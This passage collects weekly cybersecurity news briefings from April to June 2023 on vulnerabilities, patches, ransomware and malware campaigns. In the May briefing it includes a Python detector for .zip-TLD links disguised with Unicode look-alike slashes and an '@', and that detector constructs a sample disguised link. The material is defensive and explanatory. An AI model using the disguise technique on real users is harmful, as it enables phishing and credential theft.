Microsoft has released its June Patch Tuesday, addressing a number of critical, high, medium and low severity vulnerabilities. Three of the critical vulnerabilities, CVE-2023-29363, CVE-2023-32014 and CVE-2023-32015, all with a CVSS score of 9.8, are in the Windows Pragmatic General Multicast server and can lead to remote code execution by sending a specially crafted file over the network. Flaw CVE-2023-29357, also with a CVSS score of 9.8, allows privilege escalation in Microsoft SharePoint Server; exploitation does not require user interaction, and Microsoft advises applying the updates and enabling AMSI. Another vulnerability that allows remote code execution is CVE-2023-28310, with a CVSS score of 8.0, in Microsoft Exchange Server. CVE-2023-29358 allows privilege escalation to SYSTEM through the Windows GUI, as does CVE-2023-29361. A second flaw in Microsoft Exchange, CVE-2023-32031 with a CVSS score of 8.8, allows an attacker to achieve arbitrary code execution targeting server accounts. Finally, CVE-2023-29371, in the Windows Win32k kernel driver, could lead to an out-of-bounds write granting SYSTEM privileges, and the less serious CVE-2023-29352 is a security feature bypass in Windows Remote Desktop.

Third security flaw discovered in MOVEit Transfer application
Progress Software recently reported a third critical vulnerability in its MOVEit Transfer application. The new vulnerability, still without a CVE identifier, is a SQL injection that can allow privilege escalation and unauthorised access. A patch addressing this new critical security flaw is not yet available; the company stated that one is currently being tested and will be released soon. Progress also strongly advised users to modify firewall rules to deny HTTP and HTTPS traffic to MOVEit Transfer on ports 80 and 443 as a temporary protective measure. This disclosure comes a week after another set of SQL injection vulnerabilities was reported that could be used to access the application's database, and on top of CVE-2023-34362, which was exploited by the Clop ransomware gang in data theft attacks whose actors continue to extort money from affected companies. An analysis by Censys revealed that nearly 31 per cent of the more than 1,400 exposed hosts running MOVEit are in the financial services industry, 16 per cent in healthcare, nine per cent in information technology and eight per cent in government and military sectors.

AiTM campaign against companies in the financial sector
Microsoft Defender researchers have uncovered a Business Email Compromise (BEC) campaign that uses the AiTM (adversary in the middle) technique against large companies in the financial sector. In AiTM phishing, threat actors set up a proxy server between a targeted user and the website the user wants to visit; the phishing site under the attackers' control relays the traffic, allowing them to capture the target's password and session cookie. According to Microsoft, the attack started with the compromise of a reputable company's email account, which was then used to distribute the AiTM phishing and thus steal the credentials of its contacts, who accessed the URL given their trust relationship with the supposed sender (impersonated by the attacker). Microsoft attributes this campaign to a threat actor it has named Storm-1167 (in Microsoft's taxonomy, the name Storm indicates that the origin of the criminal group is unknown).

DoubleFinger distributes both Remcos RAT and GreetingGhoul stealer
SecureList has published a report on a new loader called DoubleFinger, which is notable for its use of steganographic techniques to hide payloads. This malware runs shellcode on the infected machine that downloads a PNG file from the image-sharing platform Imgur.com; the file is not actually an image but contains several components in encrypted form: GreetingGhoul, a stealer targeting cryptocurrency wallets, and the remote access Trojan Remcos. SecureList claims to have seen DoubleFinger, which is distributed via email phishing, attacking entities in Europe, the United States and Latin America.

Powerful BatCloak engine used to make malware fully undetectable
Trend Micro has published an analysis of the BatCloak malware obfuscation engine, its modular integration into modern malware, its proliferation mechanisms and the implications for interoperability as threat actors take advantage of its fully undetectable capabilities. With it, threat actors can seamlessly load multiple malware families and exploits through highly obfuscated batch files. The research showed that a staggering 80% of the recovered samples were not detected by security solutions, underlining BatCloak's ability to bypass the traditional detection mechanisms employed by security vendors. Furthermore, across the total set of 784 samples, the average detection rate was less than one, highlighting the challenge of identifying and mitigating threats associated with BatCloak-protected malware.
June 16, 2023
Cyber Security
Cyber Security Briefing, 5 – 9 June
Barracuda urges immediate replacement of compromised ESG appliances
Security firm Barracuda has issued a warning urging organisations affected by the 0-day vulnerability (CVE-2023-2868) in its Email Security Gateway (ESG) appliances to replace them completely. Although the flaw has been patched and the attackers' access to the compromised devices has been removed, the company's recommendation is to immediately replace the affected devices, regardless of the patch version installed. The exact scope of the incident is still unknown. The vulnerability, which has been exploited for at least seven months, allows remote code injection through incoming email attachments, which the attackers used to install custom malware, upload or download files, execute commands, establish persistence and set up reverse shells to servers under their control. Affected users have already been notified via the ESG user interface. Barracuda urges organisations that have not yet replaced their devices to contact support urgently by email.

Joint CISA and FBI advisory regarding CLOP ransomware
As part of the #StopRansomware campaign, CISA and the FBI have jointly issued an alert including new tactics, techniques and procedures (TTPs) and indicators of compromise (IOCs) associated with the CLOP ransomware. The advisory highlights the group's exploitation of CVE-2023-34362, a 0-day vulnerability in MOVEit Transfer, to deploy a web shell called LEMURLOOT on victims and steal data. CLOP, in a statement on its TOR website, acknowledged that this vulnerability has compromised hundreds of companies and gave those affected until 14 June to contact it and begin ransom negotiations; if no agreement is reached within 72 hours of the start of negotiations, it will publish the data. In addition, Kroll researchers found evidence of similar activity in the past logs of affected customers, indicating that the threat actors had been testing access to and data mining on compromised MOVEit Transfer servers since at least 2021.

Critical vulnerabilities in Cisco products
Cisco has issued several security advisories to correct a total of 8 vulnerabilities, 2 of which are classified as critical, 3 as high risk and 3 as medium risk. The most critical security flaws affect the Cisco Expressway Series and Cisco TelePresence Video Communication Server products and have been registered as CVE-2023-20105 and CVE-2023-20192. The first derives from incorrect handling of password change requests, which would allow an attacker to alter the passwords of any user on the system. The second could allow a local, authenticated attacker to execute commands and modify system configuration parameters. Cisco says there is no evidence that these vulnerabilities have been exploited, but recommends that users update their assets as soon as possible to mitigate them.

New Chrome security update
Google has issued a security update for its Chrome browser that fixes two vulnerabilities, one of which is classified as high severity. This security flaw was reported by security researcher Clément Lecigne on 1 June 2023, is registered as CVE-2023-3079 and is still pending a CVSS score. It is a vulnerability in the V8 engine that would allow a remote attacker to create an HTML page that triggers privilege escalation and executes arbitrary code. Google has indicated that it is aware that an exploit for this vulnerability exists. The flaw has been fixed in versions 114.0.5735.106 for Mac and Linux and 114.0.5735.110 for Windows.

Image: Freepik.
June 9, 2023
Cyber Security
Cyber Security Weekly Briefing, 27 May – 2 June
Backdoor discovered in hundreds of Gigabyte motherboards
Cybersecurity researchers at Eclypsium discovered a hidden backdoor in the firmware of hundreds of motherboard models from Gigabyte, a well-known Taiwanese manufacturer. Every time a machine with one of these motherboards is rebooted, an update application dropped and executed by the board's firmware is silently activated, allowing the installation of other, possibly malicious, software. The firmware on these systems drops a Windows binary at operating system startup, which downloads and executes another payload from Gigabyte's servers over an insecure connection without verifying the legitimacy of the file. A total of 271 different motherboard versions were identified as vulnerable. Although the feature appears to be related to the Gigabyte App Center, the possibility of a malicious backdoor is difficult to rule out given the lack of proper authentication and the use of insecure HTTP connections instead of HTTPS, which could allow man-in-the-middle attacks. Even if Gigabyte fixes the issue, firmware updates may fail on users' machines because of their complexity and the difficulty of matching them to the hardware. In addition, the updater could be abused by actors on the same network to install their own malware.

SharpPanda's campaign against the G20
Cyble has published an investigation in which it shares its findings on the campaign currently being conducted by the SharpPanda espionage group, allegedly backed by the Chinese government, against the member countries of the G20 (the international forum that brings together the world's most industrialised countries along with organisations such as the UN or the World Bank). As Cyble explains, the campaign starts with the distribution of emails to high-ranking officials of the targeted countries containing a .docx file supposedly generated by the G7 (a group of countries within the G20). This file downloads an RTF document that includes the RoyalRoad malware kit. The exploit creates a scheduled task and executes a malware DLL downloader, which in turn executes a Command & Control (C2) DLL. RoyalRoad exploits a specific set of vulnerabilities in Microsoft Office, including CVE-2018-0802, CVE-2018-0798 and CVE-2017-11882.

0-day vulnerability actively exploited in Email Security Gateway for months
Barracuda recently issued a statement warning customers about an actively exploited 0-day vulnerability in its Email Security Gateway product. The security flaw is identified as CVE-2023-2868, and exploiting it could allow a remote attacker to execute code on vulnerable systems. New information has since emerged indicating that exploitation of this vulnerability has been taking place since October 2022 using three different strains of malware, namely Saltwater, Seaspy and Seaside. Barracuda has not released any information about the victims publicly, but it has identified evidence of information exfiltration from some victims, to whom all the information has been reported. This vulnerability affects versions 5.1.3.001 to 9.2.0.006 and was fixed on May 20 and 21.

New analysis of BlackCat ransomware
The IBM research team has published an analysis describing new ransomware variants that enable better data exfiltration and evasion of security solutions. In particular, the experts note that the operators of the BlackCat/ALPHV ransomware continue to evolve the tool from two perspectives. On the one hand, the operators of this malware are reportedly using the ExMatter malware in their operations to optimise file exfiltration. On the other hand, IBM says it has analysed a new strain of BlackCat, which it has dubbed Sphynx, that stands out for a series of capabilities allowing it to evade security solutions more effectively. IBM points out that these evolutions show that the operators behind these threats are increasingly aware of their victims' infrastructure and are trying to improve their operational efficiency.

CISA warns about two vulnerabilities in industrial control systems
CISA has issued a warning about two vulnerabilities affecting industrial control systems, specifically Moxa's MXsecurity product. The first, identified as CVE-2023-33235 with a CVSS score of 7.2, is a command injection vulnerability that can be exploited by attackers who have already obtained authorisation privileges to exit the restricted shell and execute arbitrary code. The second, CVE-2023-33236 with a CVSS score of 9.8, can be exploited to create arbitrary JWT tokens and bypass authentication of the web-based APIs. Moxa has addressed these flaws in update v1.0.1. For its part, CISA recommends that users implement defensive measures to minimise the risk of exploitation, such as minimising network exposure for devices and using firewalls and VPNs.

Featured photo: DCStudio on Freepik.
June 2, 2023
Cyber Security
Cyber Security Weekly Briefing, 22 – 26 May
GitLab patches a critical vulnerability
GitLab has addressed a critical vulnerability affecting GitLab Community Edition (CE) and Enterprise Edition (EE) version 16.0.0. This security flaw has been registered as CVE-2023-2825, with a CVSSv3 score of 10, and was discovered by a security researcher named pwnie. It arises from a path traversal issue that could allow an unauthenticated attacker to read arbitrary files on the server when there is an attachment in a public project nested within at least five groups. Exploitation of this vulnerability could therefore expose sensitive data such as proprietary source code, user credentials, tokens, files and other private information. GitLab recommends that its users update to the latest version, 16.0.1, to fix this security issue.

Zyxel patches two critical vulnerabilities in its firewalls
Zyxel has issued a security advisory reporting two critical vulnerabilities affecting several of its firewall models. The first, registered as CVE-2023-33009 with a CVSSv3 score of 9.8, is a buffer overflow vulnerability in the notification function that could allow an unauthenticated malicious actor to perform remote code execution or launch a DDoS attack. Likewise, the bug assigned CVE-2023-33010, also with a CVSSv3 score of 9.8, is a buffer overflow vulnerability in the ID processing function, and its exploitation could lead to the same types of attacks as the previous one. Zyxel recommends that its users apply the corresponding security updates to reduce the risk of exploitation of these two vulnerabilities.

BEC attacks spike in volume and complexity
In a recent Microsoft Cyber Signals report, Microsoft's CTI teams warn of a significant spike in BEC (Business Email Compromise) attacks between April 2022 and April 2023, which have resulted in $2.3 billion in losses according to FBI estimates. Among the trends observed, two stand out: the use of BulletProftLink (a cybercriminal marketplace that provides all kinds of utilities for phishing and spam campaigns) and the purchase of compromised residential IP addresses, used as proxies to mask social engineering attacks. The most frequent targets are executives, managers and team leaders in finance and human resources departments with access to employees' personal information. Microsoft recommends mitigating the impact of these campaigns by maximising mailbox security options, enabling multi-factor authentication and keeping staff informed and trained about these types of attacks.

Volt Typhoon: Chinese APT targeting U.S. critical infrastructure
Both Microsoft Threat Intelligence and CISA have published reports on an APT allegedly backed by the Chinese government, which they have named Volt Typhoon and which they accuse of being behind a campaign of attacks against U.S. critical infrastructure such as government institutions, the military, telecommunications companies and shipping, among others. Microsoft specifically claims that Volt Typhoon has tried to access U.S. military assets located on the island of Guam, a key territory in case of conflict in Taiwan or the Pacific, using Internet-exposed FortiGuard devices as the entry vector and exploiting 0-day vulnerabilities to extract credentials that allow lateral movement. Microsoft points out that Volt Typhoon abuses legitimate tools present on the attacked systems, camouflaging its activity as routine processes to try to go unnoticed, a technique known as Living Off The Land (LOTL).

Vulnerability in KeePass allows master passwords to be recovered
Security researchers have published an article about a new vulnerability that allows master passwords to be recovered from the KeePass password manager. The vulnerability has been classified as CVE-2023-32784 and affects KeePass 2.x for Windows, Linux and macOS. It is expected to be patched in version 2.54, and a PoC is available for this security flaw. For exploitation, it does not matter where the memory comes from or whether the workspace is locked or not, and it is even possible to dump the password from RAM after KeePass is no longer running. Successful exploitation relies on the attacker having already compromised the target's computer, and on the password having been typed on a keyboard rather than pasted from the device's clipboard.

Featured photo: Pankaj Patel / Unsplash
May 26, 2023
Cyber Security
Cyber Security Weekly Briefing, 15 – 19 May
Vulnerabilities in cloud platforms
Otorio's team of researchers found 11 vulnerabilities affecting different cloud management platform providers: Sierra Wireless, Teltonika Networks and InHand Networks. The security flaws affecting Teltonika Networks, CVE-2023-32346, CVE-2023-32347, CVE-2023-32348, CVE-2023-2586, CVE-2023-2587 and CVE-2023-2588, were identified in its remote management system (RMS); their exploitation could expose confidential information and allow remote code execution (RCE). The vulnerabilities in InHand Networks, CVE-2023-22600, CVE-2023-22598, CVE-2023-22599, CVE-2023-22597 and CVE-2023-2261, could be exploited by malicious actors to achieve RCE. Lastly, the flaws identified in Sierra Wireless, CVE-2023-31279 and CVE-2023-31280, could allow an attacker to search for unregistered devices connected to the cloud, obtain their serial numbers and register them to an account under their control in order to execute commands.

The new .zip TLD under the researchers' magnifying glass
On May 3 Google opened registration under eight new TLDs, including .dad, .esq, .prof, .phd, .nexus, .foo, .mov and, most notably, .zip. Registration under the latter is generating a lot of controversy in the security community, as it can be used in phishing campaigns that appear to distribute compressed .zip files. Some researchers have already shown how these domains, combined with special characters in the address bar, can disguise links to malicious files as URLs that appear legitimate. An adversary could do this by using special Unicode characters such as the U+2044 (⁄) and U+2215 (∕) slashes, which visually resemble the conventional slash U+002F (/), and by exploiting the way browsers interpret the at sign (@) in a URL to achieve an unwanted redirect. For this reason, it is recommended to pay attention to links containing the characters U+2044 (⁄) and U+2215 (∕), which also include an at sign and point to allegedly compressed .zip files, since they could actually conceal a redirect to a domain under this new TLD.

Critical vulnerabilities in Cisco Small Business Series Switches
Cisco has issued a security advisory stating that it has fixed nine critical vulnerabilities in its Small Business Series Switches. The vulnerabilities have been assigned the following CVEs and CVSS scores: CVE-2023-20159 (CVSS 9.8), CVE-2023-20160 (CVSS 9.8), CVE-2023-20161 (CVSS 9.8), CVE-2023-20189 (CVSS 9.8), CVE-2023-20024 (CVSS 8.6), CVE-2023-20156 (CVSS 8.6), CVE-2023-20157 (CVSS 8.6), CVE-2023-20158 (CVSS 8.6) and CVE-2023-20162 (CVSS 7.5). All of them affect the Small Business Series Switches 200, 250, 300, 350, 350X and 500 and are due to improper validation of requests sent to the web interface, which could allow an unauthenticated remote threat actor to cause a denial of service (DoS) condition or execute arbitrary code with root privileges on an affected device. Cisco reports that it has issued software updates addressing these vulnerabilities and that there are no workarounds, so upgrading to the latest available version is recommended.

Google fixes critical vulnerability in Chrome 113
Google has issued a security update for Chrome 113 that fixes a total of 12 vulnerabilities, one of them critical. The latter, identified as CVE-2023-2721 and still pending a CVSS score, is a use-after-free (UAF) vulnerability that would allow a remote attacker to create an HTML page that triggers heap corruption when a user visits it; exploiting it therefore requires convincing the user to visit the page. This and five other fixed vulnerabilities were reported to Google by external researchers for rewards ranging from $1,500 to $7,000. The update is available as version 113.0.5672.126 for Mac and Linux and 113.0.5672.126/.127 for Windows.

Apple fixes three 0-day vulnerabilities and dozens of other CVEs across its portfolio
Apple has recently issued security updates for iOS, iPadOS, macOS, tvOS, watchOS and the Safari web browser, and warned about three 0-day vulnerabilities that are being actively exploited. The flaws affect the WebKit browser engine, which Apple uses in Safari and requires other browsers on iOS to use. The first vulnerability (CVE-2023-32409) is a sandbox escape that allows remote attackers to break out of the web content sandbox. The other two (CVE-2023-28204 and CVE-2023-32373) consist of an out-of-bounds read that allows threat actors to access sensitive information and achieve arbitrary code execution on compromised devices. The CVEs were recently assigned, so detailed information is not yet available. Apple recommends that all users update their devices to the latest available version.
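The .zip TLD item in this briefing hinges on how a URL parser treats the at sign and look-alike slashes. The Python below is an added example, not code from the briefing or from the researchers it cites: it splits a link the way RFC 3986 and browsers do (the authority ends at the first real '/', '?' or '#', and anything before the last '@' in the authority is userinfo, not the host), then flags links whose userinfo contains U+2044 or U+2215 and reports the host that would actually be contacted. The sample links are constructed placeholders built on example.com and a made-up .zip host; they are not taken from any real campaign.

```python
import unicodedata

# Slash look-alikes named in the briefing. Both render like "/" but are not
# the U+002F delimiter a URL parser actually splits on.
SLASH_CONFUSABLES = {"\u2044", "\u2215"}


def split_url(url: str) -> dict:
    """Split scheme, userinfo and host as RFC 3986 and browsers do.
    IPv6 host literals are not handled (assumption made for brevity)."""
    scheme, sep, rest = url.partition("://")
    if not sep:
        raise ValueError("expected scheme://")
    # The authority runs until the first real '/', '?' or '#'.
    end = len(rest)
    for delim in "/?#":
        idx = rest.find(delim)
        if idx != -1:
            end = min(end, idx)
    authority, remainder = rest[:end], rest[end:]
    # Everything before the LAST '@' is userinfo; the host comes after it.
    userinfo, at, hostport = authority.rpartition("@")
    if not at:
        userinfo, hostport = "", authority
    host = hostport.rsplit(":", 1)[0] if ":" in hostport else hostport
    return {"scheme": scheme, "userinfo": userinfo, "host": host.lower(), "rest": remainder}


def analyze_url(url: str) -> dict:
    """Report where a link really goes and whether it carries the disguise."""
    parts = split_url(url)
    confusables = sorted({unicodedata.name(c) for c in url if c in SLASH_CONFUSABLES})
    tld = parts["host"].rsplit(".", 1)[-1]
    # The disguise needs both ingredients: look-alike slashes so the userinfo
    # reads like a host plus path, and an '@' so the browser treats that text
    # as userinfo rather than as the destination.
    suspicious = bool(parts["userinfo"]) and bool(confusables)
    return {
        "effective_host": parts["host"],
        "tld": tld,
        "displayed_prefix": parts["userinfo"],
        "confusable_slashes": confusables,
        "zip_tld": tld == "zip",
        "suspicious": suspicious,
    }


# Constructed sample links (placeholders, not real campaign indicators):
# a disguised link, the legitimate link it imitates, and a plain .zip site.
SAMPLES = [
    "https://docs.example.com\u2215reports\u2215q2\u2215@sample-host.zip",
    "https://docs.example.com/reports/q2/archive-download.zip",
    "https://example.zip/",
]

if __name__ == "__main__":
    for link in SAMPLES:
        r = analyze_url(link)
        verdict = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{verdict:10} host={r['effective_host']!r} tld={r['tld']} "
              f"shown-as={r['displayed_prefix']!r} confusables={r['confusable_slashes']}")
```

The first sample reads to a human as a download from docs.example.com, yet the browser contacts sample-host.zip, because the text up to the last '@' is userinfo and the division slashes never terminate the authority. The same routine can run over links extracted from mail or proxy logs; a hit on `suspicious` is the condition the briefing recommends watching for, and `zip_tld` alone is only informational.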
May 19, 2023
Cyber Security
Cyber Security Weekly Briefing, 6 – 12 May
Security updates for vulnerabilities in Fortinet products
Fortinet has announced a set of security updates that fix a total of 9 vulnerabilities, 2 of which are rated high severity and affect FortiADC, FortiOS and FortiProxy. The first, registered as CVE-2023-27999, affects FortiADC versions 7.2.0, 7.1.1 and 7.1.0; a malicious actor could exploit it through crafted arguments to existing commands, allowing them to execute unauthorized commands. The second, CVE-2023-22640, arises from a bug in the sslvpnd component of FortiOS versions 7.2.x, 7.0.x, 6.4.x, 6.2.x and 6.0.x and of FortiProxy versions 7.2.x, 7.0.x, 2.0.x and 1.xx. It allows an authenticated attacker to send specially crafted requests in order to achieve arbitrary code execution. Fortinet recommends updating affected assets to the latest available version to correct these bugs. More info →

Intel investigates private key leak after MSI incident
MSI recently confirmed a data breach suffered in a security incident that reportedly led to the leakage of private keys affecting numerous devices. As a result, Intel is investigating a possible leak of Intel Boot Guard private keys. Boot Guard is a security feature that protects the operating system boot process on Intel processors. Malicious actors could use the leaked keys to disable Boot Guard protection on affected systems, allowing them to insert malicious software into the boot process. The Binarly research team has published a list of affected MSI hardware. More info →

Microsoft Patch Tuesday includes actively exploited 0-day vulnerabilities
In its latest security update, Microsoft has fixed a total of 38 vulnerabilities affecting several of its products, including Microsoft Windows, SharePoint and Office, of which 6 have been categorized as critical and 32 as important. Among them, three 0-day vulnerabilities stand out, two of which are being actively exploited. The first, registered as CVE-2023-29336 (CVSSv3 of 7.8 according to the manufacturer), is a flaw in the Win32k kernel component that malicious actors could exploit to obtain SYSTEM privileges. The second, registered as CVE-2023-24932 (CVSSv3 of 6.7 according to the manufacturer), is a flaw in Secure Boot that could be used to install the BlackLotus UEFI malware. The last of the 0-day vulnerabilities, catalogued as CVE-2023-29325 (CVSSv3 of 8.1 according to the manufacturer), has not been actively exploited; it is a flaw in Windows OLE of Microsoft Outlook that can be exploited by means of specially crafted emails to trigger remote code execution. More info →

SAP fixes 28 vulnerabilities at its May patch day
SAP has released 24 security notes covering a total of 28 vulnerabilities, two of which are classified as critical and nine as high priority. Note No. 3328495, considered critical with a CVSS score of 9.8, fixes five vulnerabilities in version 14.2 of the Reprise License Manager (RLM) component used with SAP 3D Visual Enterprise License Manager. CVE-2021-44151 would allow an attacker to hijack a session through brute force; CVE-2021-44152 could lead to an unauthenticated user changing the password of any user and gaining access to their account; CVE-2021-44153 could be exploited to execute a malicious binary; CVE-2021-44154 could cause a buffer overflow; and CVE-2021-44155 would allow an attacker to enumerate valid users. It is recommended to upgrade SAP 3D Visual Enterprise License Manager to version 15.0.1-sap2 and to disable the RLM web interface. Additionally, note #3307833, with CVSS 9.1, includes information disclosure bug fixes for SAP BusinessObjects Business Intelligence Platform. More info →

New details about the distribution of Amadey and Redline Stealer
McAfee Labs has published an analysis of the malicious executable used to distribute several types of malware, including Amadey and Redline Stealer. Its original name is wextract.exe.mui, and it embeds a CAB file whose RUNPROGRAM attribute is used to start cydn.exe, which in turn contains two further executables, aydx.exe and mika.exe, that are deployed as malware. A second attribute, POSTRUNPROGRAM, contains an instruction to run vona.exe. All of these executables are dropped into the TEMP folder as temporary files and, together with other executables spawned by their child processes, are linked to Redline Stealer and Amadey, as well as to the disabling of security mechanisms. More info → Featured photo: Freepik.
May 12, 2023
Cyber Security
Cyber Security Weekly Briefing, 29 April – 5 May
Critical vulnerability in Zyxel firewalls
Network equipment manufacturer Zyxel has released security patches for a critical vulnerability affecting its firewalls. The vulnerability, discovered and reported by the TRAPA Security team, has been classified as CVE-2023-28771 with a CVSS of 9.8. It allows an unauthenticated attacker to execute some operating system commands remotely by sending manipulated packets to an affected device. The security flaw affects the following firmware versions: ATP (ZLD V4.60 to V5.35, patched in ZLD V5.36), USG FLEX (ZLD V4.60 to V5.35, patched in ZLD V5.36), VPN (ZLD V4.60 to V5.35, patched in ZLD V5.36) and ZyWALL/USG (ZLD V4.60 to V4.73, patched in ZLD V4.73). The vulnerability is not known to have been exploited so far; however, Zyxel recommends that firewalls be upgraded to the latest available version. More info →

Google releases Chrome 113 with 15 security updates
Google has released version 113 of Google Chrome to the stable channel for Windows, macOS and Linux, fixing up to 15 vulnerabilities, 10 of them reported to Google through its bug bounty program. None of the vulnerabilities now fixed are of high criticality; the most relevant is the one catalogued as CVE-2023-2459, still without a CVSS score, for which Google has paid 7,500 dollars to the researcher Rong Jian. It is an inappropriate implementation issue in Prompts, considered of medium severity, that would allow a remote attacker to bypass permission restrictions through a manipulated HTML page. This latest iteration of the browser is deployed as Chrome version 113.0.5672.63 for Linux and macOS, and as Chrome versions 113.0.5672.63/.64 for Windows. More info →

Vulnerabilities in BGP protocol allow attackers to carry out DoS attacks
Researchers at Forescout Vedere Labs have published a report detailing new vulnerabilities in the BGP protocol. The vulnerabilities, already patched and with a CVSS of 6.5, have been classified as CVE-2022-40302, CVE-2022-40318 and CVE-2022-43681. The flaws relate to the parsing of BGP messages in the FRRouting implementation and could be exploited to achieve a denial of service on vulnerable BGP peers. The DoS condition can be prolonged indefinitely by repeatedly sending malicious packets. It should be noted that two of these issues (CVE-2022-40302 and CVE-2022-43681) can be triggered before FRRouting validates the BGP Identifier and ASN fields. More info →

Critical Vulnerability in Cisco Phone Adapters
Cisco has issued a security advisory warning of a critical vulnerability in Cisco SPA112 two-port phone adapters. The security flaw has been logged as CVE-2023-20126, with a CVSSv3 of 9.8, and is due to a flaw in the authentication process within the firmware update feature. Exploiting this vulnerability could allow an attacker to execute arbitrary code on the affected device with full privileges and, consequently, could help a threat actor move laterally in a network. However, most of these devices are estimated not to be exposed to the Internet, which makes the flaw mainly exploitable from the local network. It should be noted that Cisco has indicated that the affected model has reached the end of its useful life, so it will not receive any security updates; Cisco recommends replacing the adapter with the ATA 190 series model. More info →

Fleckpe: new Android malware that subscribes victims to premium services
Securelist has found a new Android malware called Fleckpe spread through at least 11 apps available on Google Play that together accumulate more than 620,000 downloads. Fleckpe subscribes victims, without their permission, to various premium services with special pricing, which deliver part of the proceeds to the threat actors. According to Securelist, Fleckpe has been active since 2022 and has been spread through 11 apps (already removed from the store by Google), most of them image editors. Fleckpe works by receiving from its C2 the URL at which it must subscribe the victim, opening it in invisible mode and copying the confirmation code from the notifications. Once the process is completed, the app works normally, thus avoiding raising the victim's suspicions. More info →
May 5, 2023
Cyber Security
Cyber Security Weekly Briefing, 22 – 28 April
SolarWinds fixes high severity vulnerabilities
In its latest security update, SolarWinds has fixed a total of 2 high-severity vulnerabilities, which could lead to command execution and privilege escalation. The more serious of the two is CVE-2022-36963 (CVSS of 8.8), described as a command injection flaw in the SolarWinds infrastructure monitoring and management solution. The second high-severity vulnerability is CVE-2022-47505 (CVSS of 7.8), a local privilege escalation flaw. Both vulnerabilities were reported by researchers from the Trend Micro Zero Day Initiative and were fixed in SolarWinds version 2023.2. The new release also resolves the medium-severity CVE-2022-47509, which could be exploited remotely to append URL parameters and inject HTML code. Finally, SolarWinds fixed two medium-severity vulnerabilities in Database Performance Analyzer, leading respectively to the disclosure of sensitive information and allowing users to enumerate different folders on the server. More info →

RustBucket: New malware targeting macOS users
Researchers at Jamf Threat Labs have discovered a new malware family targeting macOS users in recent attacks that is capable of obtaining additional payloads from its command and control (C&C) server. The malware, called RustBucket, has been attributed to the North Korea-associated advanced persistent threat (APT) actor BlueNoroff, believed to be a subgroup of the notorious Lazarus Group. RustBucket is executed in three stages. The first stage uses fraudulent domains and social engineering techniques, as well as an unsigned application called Internal PDF Viewer.app that is designed to obtain and execute the stage two payload on the system. The second stage consists of a signed application masquerading as a legitimate Apple package identifier; once again the malware communicates with the command and control (C&C) server to obtain the stage three payload, a signed trojan written in Rust that can run on ARM and x86 architectures, collect system information including a list of running processes, identify whether it is running in a virtual machine, and allow the attacker to perform several actions on infected machines. More info →

Critical vulnerabilities in Cisco Industrial Network Director and Modeling Labs
Cisco has released security updates to patch two critical vulnerabilities in its Industrial Network Director and Modeling Labs products. The first vulnerability, listed as CVE-2023-20036 with a CVSS of 9.9, addresses an issue in the Industrial Network Director web interface that would allow an authenticated attacker on the system to modify a request in order to execute commands with administrative privileges or access sensitive data. The second vulnerability, CVE-2023-20154, has a CVSS of 9.1 and resides in the Cisco Modeling Labs external authentication mechanism, which could allow an unauthenticated remote attacker to access the web interface with administrative privileges. The latter would affect products configured with LDAP authentication. More info →

Google receives legal authorization to act against CryptBot
Following the authorization issued by a federal judge in the Southern District of New York in the civil action against the operators of the CryptBot malware, Google has begun to disable the infrastructure related to its distribution. The complaint reportedly targets the largest distributors of CryptBot, allegedly located in Pakistan, and is based on allegations of wire fraud and intellectual property infringement. The company estimates that this malware has infected more than 670,000 computers in the last year, targeting Google Chrome users to exfiltrate their data. The court has issued a temporary injunction to prevent the spread of this malware, which would allow Google to take action against current and future domains linked to the distribution of CryptBot. More info →

RTM Locker ransomware targets Linux systems
The Uptycs research team has identified a new strain of RTM Locker ransomware targeting Linux operating systems. It is worth noting that security researchers at Trellix recently published an analysis of the TTPs used by the Read The Manual (RTM) group, a provider of Ransomware as a Service (RaaS). Its development has since continued to evolve into this new strain, which infects Linux, NAS and ESXi hosts and is based on the leaked source code of the Babuk ransomware. It is also characterized by using a combination of ECDH on Curve25519 and ChaCha20 to encrypt files, subsequently urging victims to contact support within 48 hours via Tox or threatening to publish data if their demands are not accepted. According to researchers, the threat actor is known to avoid high-profile targets such as critical infrastructure and hospitals, among others, so as to attract as little attention as possible. More info →
April 28, 2023
Cyber Security
Cyber Security Weekly Briefing, 15 – 21 April
Google fixes two new actively exploited 0-day vulnerabilities
Google has issued new security advisories on the identification of 0-day vulnerabilities affecting the Chrome browser that are being actively exploited. The first security flaw has been reported as CVE-2023-2033. This vulnerability is due to a flaw in the Chrome V8 JavaScript engine that could allow a malicious actor to exploit it remotely via a specially crafted HTML page. The second, CVE-2023-2136, lies in the cross-platform 2D graphics library Skia and, if exploited, could lead to incorrect graphics rendering, memory corruption or remote code execution resulting in unauthorised system access. More info →

LockBit samples found targeting macOS systems
MalwareHunterTeam has found a LockBit sample with the ability to infect multiple operating systems, including, for the first time, Apple's macOS. MalwareHunterTeam highlights this as a remarkable milestone, as it is also the first time that one of the major ransomware groups has been known to create malware specifically targeting macOS. The file found includes an encryptor called 'locker_Apple_M1_64', for newer Apple devices, and another for the PowerPC CPUs used by older Macs. An in-depth analysis of the file shows that, so far, this is an early version of this LockBit strain that could not be used in a real attack, but it shows the ransomware group's interest in attacking macOS devices in the near future. More info →

New QBot campaign identified
Security researchers have published an analysis of the TTPs used in a new campaign of the well-known QBot malware, which now attacks victims through PDF files and Windows Script Files (WSF). This phishing campaign is distributed via emails that use existing legitimate email threads and contain an attached PDF file that, when opened, downloads a ZIP file containing a WSF file. This file ultimately aims to execute a PowerShell script, which attempts to download a QBot DLL. It is worth noting that numerous actors such as BlackBasta, REvil, PwndLocker, Egregor, ProLock and MegaCortex have used QBot for initial access to corporate networks, deploying additional payloads such as Cobalt Strike, Brute Ratel and other malware that provide access to the compromised device. More info →

New PoC enables VM2 sandbox bypassing
Security researchers have released a new PoC capable of bypassing the VM2 sandbox, widely used in the development and security world to run and test untrusted code in an isolated environment. This bypass would allow malware to run outside the constraints of the sandbox environment. The first vulnerability was identified as CVE-2023-29017 a fortnight ago, and the latest two have been identified as CVE-2023-29199 and CVE-2023-30547. The latter vulnerability, with a CVSS of 9.8, can be exploited by malicious actors due to a sanitisation flaw that allows the attacker to throw a host exception inside "handleException()". Users are advised to fix the vulnerability by upgrading to version 3.9.17 as soon as possible to avoid a potential security incident. More info →

Critical Vulnerabilities in Alibaba Cloud PostgreSQL Databases
